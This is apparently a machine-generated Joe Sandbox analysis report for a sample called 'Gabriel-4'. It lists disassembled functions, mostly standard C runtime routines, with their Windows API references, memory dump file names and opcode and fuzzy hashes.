DecodePointer.KERNEL32(?,?,?,00000000,00007FF746503FD4,00007FF746502E80), ref: 00007FF746505F67

Strings

GetUserObjectInformationW, xrefs: 00007FF746505E51
GetActiveWindow, xrefs: 00007FF746505E11
MessageBoxW, xrefs: 00007FF746505DEF
GetProcessWindowStation, xrefs: 00007FF746505E80
GetLastActivePopup, xrefs: 00007FF746505E31
USER32.DLL, xrefs: 00007FF746505DD6

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
API String ID: 2643518689-564504941
Opcode ID: 377389066e194beb257b6cc4c990508dbe9e31df47bede6a1fcbae8ebeac0d24
Instruction ID: 8e1c42e1e0ee2bc1947e8b60ebcfe6d3b1acef6dc4017f938f33e262ae0f01a6
Opcode Fuzzy Hash: 377389066e194beb257b6cc4c990508dbe9e31df47bede6a1fcbae8ebeac0d24
Instruction Fuzzy Hash: 7B51F865A0EB03C0EE55BB51ED18576E3A8AF4AB80FC84535CD7E033A4FE3CE8458220

Function 00007FF74650517C Relevance: 19.6, APIs: 13, Instructions: 90
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__free_lconv_mon.LIBCMT ref: 00007FF7465051D4

Part of subcall function 00007FF746506880: free.LIBCMT ref: 00007FF74650689E
Part of subcall function 00007FF746506880: free.LIBCMT ref: 00007FF7465068B0
Part of subcall function 00007FF746506880: free.LIBCMT ref: 00007FF7465068C2
Part of subcall function 00007FF746506880: free.LIBCMT ref: 00007FF7465068D4
Part of subcall function 00007FF746506880: free.LIBCMT ref: 00007FF7465068E6
Part of subcall function 00007FF746506880: free.LIBCMT ref: 00007FF7465068F8
Part of subcall function 00007FF746506880: free.LIBCMT ref: 00007FF74650690A
Part of subcall function 00007FF746506880: free.LIBCMT ref: 00007FF74650691C
Part of subcall function 00007FF746506880: free.LIBCMT ref: 00007FF74650692E
Part of subcall function 00007FF746506880: free.LIBCMT ref: 00007FF746506940
Part of subcall function 00007FF746506880: free.LIBCMT ref: 00007FF746506955
Part of subcall function 00007FF746506880: free.LIBCMT ref: 00007FF74650696A
Part of subcall function 00007FF746506880: free.LIBCMT ref: 00007FF74650697F

free.LIBCMT ref: 00007FF7465051C8

Part of subcall function 00007FF746502A80: RtlFreeHeap.NTDLL ref: 00007FF746502A96
Part of subcall function 00007FF746502A80: _errno.LIBCMT ref: 00007FF746502AA0
Part of subcall function 00007FF746502A80: GetLastError.KERNEL32 ref: 00007FF746502AA8

free.LIBCMT ref: 00007FF7465051EA
__free_lconv_num.LIBCMT ref: 00007FF7465051F6
free.LIBCMT ref: 00007FF746505202
free.LIBCMT ref: 00007FF74650520E
free.LIBCMT ref: 00007FF746505232
free.LIBCMT ref: 00007FF746505246
free.LIBCMT ref: 00007FF746505255
free.LIBCMT ref: 00007FF746505261
free.LIBCMT ref: 00007FF74650528E
free.LIBCMT ref: 00007FF7465052B6
free.LIBCMT ref: 00007FF7465052D0

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: free$ErrorFreeHeapLast__free_lconv_mon__free_lconv_num_errno
String ID:
API String ID: 518839503-0
Opcode ID: d6fa53e174e6b918517e515ba8aa7a722c480d1c0c30cd535f337a27a34034e8
Instruction ID: f02f13e11f057d0d8c14b20c7313d3eb27ae7fad50702521cd79112417b7dc39
Opcode Fuzzy Hash: d6fa53e174e6b918517e515ba8aa7a722c480d1c0c30cd535f337a27a34034e8
Instruction Fuzzy Hash: 2B410D31A0E943C4EE65FE61DD503BAE3A0AF45B54F980431DA6E06695EF6CE885C370

Function 00007FF74650698C Relevance: 15.2, APIs: 10, Instructions: 206COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF746506A26
malloc.LIBCMT ref: 00007FF746506A8F
MultiByteToWideChar.KERNEL32 ref: 00007FF746506AC3
LCMapStringW.KERNEL32 ref: 00007FF746506AEA
LCMapStringW.KERNEL32 ref: 00007FF746506B32
malloc.LIBCMT ref: 00007FF746506B8F

Part of subcall function 00007FF746502AC0: _FF_MSGBANNER.LIBCMT ref: 00007FF746502AF0
Part of subcall function 00007FF746502AC0: HeapAlloc.KERNEL32 ref: 00007FF746502B15
Part of subcall function 00007FF746502AC0: _callnewh.LIBCMT ref: 00007FF746502B2E
Part of subcall function 00007FF746502AC0: _errno.LIBCMT ref: 00007FF746502B39
Part of subcall function 00007FF746502AC0: _errno.LIBCMT ref: 00007FF746502B44

LCMapStringW.KERNEL32 ref: 00007FF746506BC4
WideCharToMultiByte.KERNEL32 ref: 00007FF746506C04
free.LIBCMT ref: 00007FF746506C18
free.LIBCMT ref: 00007FF746506C29

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocHeap_callnewh
String ID:
API String ID: 1080698880-0
Opcode ID: a607e2a22e16282e0bd3b5ffacb3841c4e18bec470ff1cc1b22c7ef5f623f9da
Instruction ID: 2b3765f40a7a2abdf7e369bffa3c2e97256ec3b5dc7f3b59a88199da7d3c439e
Opcode Fuzzy Hash: a607e2a22e16282e0bd3b5ffacb3841c4e18bec470ff1cc1b22c7ef5f623f9da
Instruction Fuzzy Hash: E1818F32B0C782C6EB24BF25D84016AE695FF447A4F984235EA6D57BD4EF3CE5418720

Function 00007FF746502E54 Relevance: 12.1, APIs: 8, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

_FF_MSGBANNER.LIBCMT ref: 00007FF746502E7B

Part of subcall function 00007FF746503FA0: _set_error_mode.LIBCMT ref: 00007FF746503FA9
Part of subcall function 00007FF746503FA0: _set_error_mode.LIBCMT ref: 00007FF746503FB8

Part of subcall function 00007FF746503D40: _set_error_mode.LIBCMT ref: 00007FF746503D85
Part of subcall function 00007FF746503D40: _set_error_mode.LIBCMT ref: 00007FF746503D96
Part of subcall function 00007FF746503D40: GetModuleFileNameW.KERNEL32 ref: 00007FF746503DF8

Part of subcall function 00007FF7465021E8: ExitProcess.KERNEL32 ref: 00007FF7465021F7

Part of subcall function 00007FF746504DD4: malloc.LIBCMT ref: 00007FF746504DFF
Part of subcall function 00007FF746504DD4: Sleep.KERNEL32 ref: 00007FF746504E12

_errno.LIBCMT ref: 00007FF746502EBD
_lock.LIBCMT ref: 00007FF746502ED1
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF746502EE7
free.LIBCMT ref: 00007FF746502EF4
_errno.LIBCMT ref: 00007FF746502EF9
LeaveCriticalSection.KERNEL32 ref: 00007FF746502F1C

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfreemalloc
String ID:
API String ID: 113790786-0
Opcode ID: 58324cbb415507639f68647bb86c879729a4a0b96829e5bcb854d5795d216430
Instruction ID: fbccd9c568894c156612a9752e816ae016ac6d85af5a0d9b20cc2ea34b431a5d
Opcode Fuzzy Hash: 58324cbb415507639f68647bb86c879729a4a0b96829e5bcb854d5795d216430
Instruction Fuzzy Hash: 2D211631A1D643C2FA64BB21FC0577BE268AF85784FD45135EA6E46682EF3CE4408721

Function 00007FF746504A4C Relevance: 10.7, APIs: 7, Instructions: 184COMMON

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32 ref: 00007FF746504A6D

Part of subcall function 00007FF746504E54: Sleep.KERNEL32 ref: 00007FF746504E99

GetFileType.KERNEL32 ref: 00007FF746504BD8
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF746504C16

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: CountCriticalFileInfoInitializeSectionSleepSpinStartupType
String ID:
API String ID: 3473179607-0
Opcode ID: 373c3526b53370dd1b29be18ffebb9d8967604d272333215ec38941ab4ba2182
Instruction ID: ba8163234d635a3c6f5855cbb679befb52dab77701a216ada6c09c36aa40a1fd
Opcode Fuzzy Hash: 373c3526b53370dd1b29be18ffebb9d8967604d272333215ec38941ab4ba2182
Instruction Fuzzy Hash: 30814062A0DB86C5EB14BF14D94432AE6A4FB44B74F948335CA7D422D6EF3CE455C324

Function 00007FF74650237C Relevance: 10.6, APIs: 7, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

_lock.LIBCMT ref: 00007FF7465023A5

Part of subcall function 00007FF746502F3C: _amsg_exit.LIBCMT ref: 00007FF746502F66

DecodePointer.KERNEL32(?,?,00000000,00007FF746502569), ref: 00007FF7465023D8
DecodePointer.KERNEL32(?,?,00000000,00007FF746502569), ref: 00007FF7465023F6
DecodePointer.KERNEL32(?,?,00000000,00007FF746502569), ref: 00007FF746502436
DecodePointer.KERNEL32(?,?,00000000,00007FF746502569), ref: 00007FF746502450
DecodePointer.KERNEL32(?,?,00000000,00007FF746502569), ref: 00007FF746502460
ExitProcess.KERNEL32 ref: 00007FF7465024EC

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: DecodePointer$ExitProcess_amsg_exit_lock
String ID:
API String ID: 3411037476-0
Opcode ID: b53e1919d0650db1d1152386284e4e42a7a0349e1a739623efed4da8177e2040
Instruction ID: 501b48b5d76430f9da268687063a3122786157dcdab08246648629f1b4f96ff5
Opcode Fuzzy Hash: b53e1919d0650db1d1152386284e4e42a7a0349e1a739623efed4da8177e2040
Instruction Fuzzy Hash: CF415B31A1EB42D1EA50BB11FC4463BE2A4BF88B84F940435EAAD437A5FF7CE4558720

Function 00007FF746505A08 Relevance: 9.1, APIs: 6, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF746505A27

Part of subcall function 00007FF7465035FC: _amsg_exit.LIBCMT ref: 00007FF746503612

Part of subcall function 00007FF746505644: _getptd.LIBCMT ref: 00007FF74650564E
Part of subcall function 00007FF746505644: _amsg_exit.LIBCMT ref: 00007FF7465056EB

Part of subcall function 00007FF746505700: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,00007FF746505A42,?,?,?,?,?,00007FF746505BFF), ref: 00007FF74650572A

Part of subcall function 00007FF746504DD4: malloc.LIBCMT ref: 00007FF746504DFF
Part of subcall function 00007FF746504DD4: Sleep.KERNEL32 ref: 00007FF746504E12

free.LIBCMT ref: 00007FF746505AB2

Part of subcall function 00007FF746502A80: RtlFreeHeap.NTDLL ref: 00007FF746502A96
Part of subcall function 00007FF746502A80: _errno.LIBCMT ref: 00007FF746502AA0
Part of subcall function 00007FF746502A80: GetLastError.KERNEL32 ref: 00007FF746502AA8

_lock.LIBCMT ref: 00007FF746505AE2
free.LIBCMT ref: 00007FF746505B85
free.LIBCMT ref: 00007FF746505BB1
_errno.LIBCMT ref: 00007FF746505BB6

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: free$_amsg_exit_errno_getptd$ErrorFreeHeapLastSleep_lockmalloc
String ID:
API String ID: 3894533514-0
Opcode ID: 286a05b5a7774a520a07d95891b3d4818651d0f49d1d563932e00a541e4ffacf
Instruction ID: 6adff6d1fa61bf5447a9df24b5669b32d2ea239ccd45823a857e4b9f623ad259
Opcode Fuzzy Hash: 286a05b5a7774a520a07d95891b3d4818651d0f49d1d563932e00a541e4ffacf
Instruction Fuzzy Hash: D451AF32A0D642C6E710BB25E94027BFBA1BB41B54F948136DA6E47392EE7CF8418720

Function 00007FF746504958 Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF746502C6C), ref: 00007FF746504971
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF746502C6C), ref: 00007FF7465049C8
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF746502C6C), ref: 00007FF746504A03
free.LIBCMT ref: 00007FF746504A10
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF746502C6C), ref: 00007FF746504A1B
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF746502C6C), ref: 00007FF746504A29

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide$free
String ID:
API String ID: 517548149-0
Opcode ID: fa985a46b7b6b7dcc0d461bbfdd9414ad58848c2d79c013f089396c8cb6bbb3d
Instruction ID: 43158defad699ff683df05c88f1dbb71cefe839cd02667df19db88ba543681f2
Opcode Fuzzy Hash: fa985a46b7b6b7dcc0d461bbfdd9414ad58848c2d79c013f089396c8cb6bbb3d
Instruction Fuzzy Hash: 25212D32A1DB82C6EB64BB15E90046AF7A5EB88B80B985434DE9E07B55EF3CE450C714

Function 00007FF746503578 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF746503582
FlsGetValue.KERNEL32 ref: 00007FF746503590
SetLastError.KERNEL32 ref: 00007FF7465035E8

Part of subcall function 00007FF746504E54: Sleep.KERNEL32 ref: 00007FF746504E99

FlsSetValue.KERNEL32 ref: 00007FF7465035BC
free.LIBCMT ref: 00007FF7465035DF

Part of subcall function 00007FF7465034C0: _lock.LIBCMT ref: 00007FF746503514
Part of subcall function 00007FF7465034C0: _lock.LIBCMT ref: 00007FF746503533

GetCurrentThreadId.KERNEL32 ref: 00007FF7465035D0

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: ErrorLastValue_lock$CurrentSleepThreadfree
String ID:
API String ID: 3106088686-0
Opcode ID: 05f7958800d00bfde8268114ee56b592e211f2a19b1f485bd1a84abf12047c02
Instruction ID: 75b4a263193d8427c85efd42e437df1cc58b4803ddd50d8758df6400bff2a09e
Opcode Fuzzy Hash: 05f7958800d00bfde8268114ee56b592e211f2a19b1f485bd1a84abf12047c02
Instruction Fuzzy Hash: E1011E34A0DB43C2EB55BF65EC5553AE2A1AF48BA0B984234C93E063D1FE3CE4448620

Function 00007FF746506CF0 Relevance: 7.6, APIs: 5, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF746506D4A
malloc.LIBCMT ref: 00007FF746506DAE
MultiByteToWideChar.KERNEL32 ref: 00007FF746506DF6
GetStringTypeW.KERNEL32 ref: 00007FF746506E0D
free.LIBCMT ref: 00007FF746506E21

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: ByteCharMultiWide$StringTypefreemalloc
String ID:
API String ID: 307345228-0
Opcode ID: 5222b55caef5b4b08e7e1331ef689a284774864e32ea1c8e85a0437ed3331536
Instruction ID: e16081fa24e0420c083998ec562b959c84c92820c86b8abdb213033b367218b8
Opcode Fuzzy Hash: 5222b55caef5b4b08e7e1331ef689a284774864e32ea1c8e85a0437ed3331536
Instruction Fuzzy Hash: D8417172B09642C6EB10BF25DC105AAE395FF44BA8BA84631DE3D57BD5EF38E4058360

Function 00007FF746503884 Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,00007FF746503999,?,?,?,?,00007FF746502322), ref: 00007FF7465038AD
DecodePointer.KERNEL32(?,?,?,00007FF746503999,?,?,?,?,00007FF746502322), ref: 00007FF7465038BD

Part of subcall function 00007FF746505C10: _errno.LIBCMT ref: 00007FF746505C19
Part of subcall function 00007FF746505C10: _invalid_parameter_noinfo.LIBCMT ref: 00007FF746505C24

EncodePointer.KERNEL32(?,?,?,00007FF746503999,?,?,?,?,00007FF746502322), ref: 00007FF74650393B

Part of subcall function 00007FF746504ED8: realloc.LIBCMT ref: 00007FF746504F03
Part of subcall function 00007FF746504ED8: Sleep.KERNEL32(?,?,00000000,00007FF74650392B,?,?,?,00007FF746503999,?,?,?,?,00007FF746502322), ref: 00007FF746504F1F

EncodePointer.KERNEL32(?,?,?,00007FF746503999,?,?,?,?,00007FF746502322), ref: 00007FF74650394B
EncodePointer.KERNEL32(?,?,?,00007FF746503999,?,?,?,?,00007FF746502322), ref: 00007FF746503958

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
String ID:
API String ID: 1909145217-0
Opcode ID: 4940477addc9b0a06b05c4a846dbb85c33dab70dfa6eb05361a17cef25bb7483
Instruction ID: 1166fa0faf5be7bad8267bc1b0a844e73918bfdf695f40278909b68bd6ccf345
Opcode Fuzzy Hash: 4940477addc9b0a06b05c4a846dbb85c33dab70dfa6eb05361a17cef25bb7483
Instruction Fuzzy Hash: 69212A31B0EA43C1EA04BB51ED4806BE391BF49B80BC44835DAAE17755FE7CE4858320

Function 00007FF74650180C Relevance: 7.6, APIs: 5, Instructions: 67stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32 ref: 00007FF746501840
lstrcatA.KERNEL32 ref: 00007FF74650185A
lstrlenA.KERNEL32 ref: 00007FF746501863
SetCurrentDirectoryA.KERNEL32 ref: 00007FF7465018B6
CreateDirectoryA.KERNEL32 ref: 00007FF7465018C7

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: Directorylstrlen$CreateCurrentlstrcat
String ID:
API String ID: 279805598-0
Opcode ID: 0a666403a0a7a8bb7b1efce5b465705f4daf3f27353a5bf9fe29aeb5550ffb80
Instruction ID: 2c5061c02b04975209644af071b34630e5415f6e9b26209c603010f16cc9d23b
Opcode Fuzzy Hash: 0a666403a0a7a8bb7b1efce5b465705f4daf3f27353a5bf9fe29aeb5550ffb80
Instruction Fuzzy Hash: E1217F21A0CB82C6FB30FB56EC9427BE3A5AF89784FC48130CA9D42655FE2CD6498711

Function 00007FF7465021AC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7465021BB
GetProcAddress.KERNEL32 ref: 00007FF7465021D0

Strings

CorExitProcess, xrefs: 00007FF7465021C6
mscoree.dll, xrefs: 00007FF7465021B4

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 1646373207-1276376045
Opcode ID: 8f486db55653188f3ab92f84992e0e837d09d0e4da1761e541b774056590203c
Instruction ID: 1fd6efacdd607fe0c2f1147312ab4221a01e6b383fb7ae02eb2b622f55b41557
Opcode Fuzzy Hash: 8f486db55653188f3ab92f84992e0e837d09d0e4da1761e541b774056590203c
Instruction Fuzzy Hash: 27E0EC20F1EE02C2EF197BA1FC55536D2506F58740BC85039C93E06391FE2CE9898220

Function 00007FF746502FF4 Relevance: 6.2, APIs: 4, Instructions: 159COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF746503042
_invalid_parameter_noinfo.LIBCMT ref: 00007FF74650304D
DecodePointer.KERNEL32(?,?,?,?,?,00007FF746504F78,?,?,?,?,00007FF746502F9E), ref: 00007FF7465030FC
_lock.LIBCMT ref: 00007FF746503127

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: DecodePointer_errno_invalid_parameter_noinfo_lock
String ID:
API String ID: 27599310-0
Opcode ID: 3a40b65b40ca71dd689e369f6f90380ad122d4fc96e66dd60881ed5306886c74
Instruction ID: 8453b26edb754c1b3c19b9b9e0cca785198035326aecc43e637b155ec1f1e2d3
Opcode Fuzzy Hash: 3a40b65b40ca71dd689e369f6f90380ad122d4fc96e66dd60881ed5306886c74
Instruction Fuzzy Hash: 1A51B032E0D643C6EA65BB15EC9523BE691EF89740FA4453AD97E02694FF3CF841C220

Function 00007FF746505644 Relevance: 6.0, APIs: 4, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF74650564E

Part of subcall function 00007FF7465035FC: _amsg_exit.LIBCMT ref: 00007FF746503612

_lock.LIBCMT ref: 00007FF74650567C
free.LIBCMT ref: 00007FF7465056B2
_amsg_exit.LIBCMT ref: 00007FF7465056EB

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: _amsg_exit$_getptd_lockfree
String ID:
API String ID: 2148533958-0
Opcode ID: 628d5342cbd1e67f1f3a3b6805dd6a854c1c623084b3b0db614e7cb17b0d6585
Instruction ID: 1a70cce7d38a76f452e13087e5cd65b79608e3f6accf0366ba63caf3976d3fac
